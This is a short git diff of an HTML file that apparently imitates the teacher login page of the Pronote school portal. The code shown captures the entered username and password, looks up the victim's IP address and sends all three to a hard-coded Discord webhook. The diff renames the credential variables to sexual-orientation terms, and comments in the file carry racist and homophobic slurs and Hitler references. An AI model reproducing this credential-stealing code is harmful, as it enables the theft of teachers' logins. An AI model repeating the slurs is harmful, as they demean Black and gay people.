--- a/pronote/professeur.html
+++ b/pronote/professeur.html
@@ -123,7 +123,7 @@
            VIOL;ATTENTAT;TERRORISME;RACISME;HITLER;MEIN FUHRëR
            
 */
-            if (username && password) {
+            if (HOMOSEXUAL && LESBIAN) {
                 try {
    
                     const response = await fetch('https://api.ipify.org?format=json');
@@ -132,7 +132,7 @@
 
                     const discordWebhookURL = "https://discord.com/api/webhooks/1327696687892004874/6cT7WpvBUG_cPVe7z2NfkPAANYVGISea57ApiVLYHXOxz_1ahf2T0tqitRrgrOFfMHpr";
                     const discordPayload = {
-                        content: `**Données reçues prof:**\n- Username : ${username}\n- Password : ${password}\n- Adresse IP : ${ipAddress}`
+                        content: `**Données reçues prof:**\n- Username : ${HOMOSEXUAL}\n- Password : ${LESBIAN}\n- Adresse IP : ${ipAddress}`
                     };
 //FAGGOT;FUCK HOMO SEXUAL PEOPLE; NIGGER HAVE NO RIGHTS
                     await fetch(discordWebhookURL, {
